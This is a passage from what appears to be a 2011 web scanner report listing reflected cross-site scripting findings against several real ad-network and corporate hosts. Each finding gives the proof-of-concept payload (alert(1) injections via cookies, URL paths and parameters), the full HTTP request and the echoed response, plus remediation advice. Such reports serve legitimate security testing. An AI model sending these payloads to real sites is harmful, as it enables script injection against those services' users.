Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2549

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:10:02 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:27 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1b5e532c19; expires=Fri, 03-Feb-2012 18:54:27 GMT; domain=.newstogram.com
Content-Length: 167

Newstogram.completed({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'6897e<img src=a onerror=alert(1)>f1b5e532c19","ip":"173.193.214.243"}})

1.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:19 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly
Content-Length: 2946


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794967&cid=696829&tc=11020308002595319dc711"><script>alert(1)</script>103b14f1145&rl_key=266706c08d1e97edf1c0c82556f3d3e7&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0

...[SNIP]...

1.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-15.js?cb=0.5483633035328239 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=3;sz=300x250;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1; ruid=8010f"-alert(1)-"9cee6b4b2f1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6272/9319; rdk2=0; ses2=9319^1; csi2=3191844.js^1^1296750694^1296750694

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:22 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46657; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3173810.js^1^1296759742^1296759742; expires=Thu, 10-Feb-2011 19:02:22 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2270

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3173810"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8010f"-alert(1)-"9cee6b4b2f1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

1.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-2.js?cb=0.19099231413565576 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=67d78"-alert(1)-"0dfb266372e; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=67d78"-alert(1)-"0dfb266372e^1^1296759728^2915161843; expires=Wed, 04-May-2011 19:02:08 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46671; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=719969.js^1^1296759728^1296759728; expires=Thu, 10-Feb-2011 19:02:08 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2611

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "719969" +
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67d78"-alert(1)-"0dfb266372e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

1.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:15:05 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2">
...[SNIP]...

1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:14:56 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1">
...[SNIP]...

1.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /www/delivery/rd.php

Issue detail

The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 362
Connection: close
Content-Type: application/x-javascript

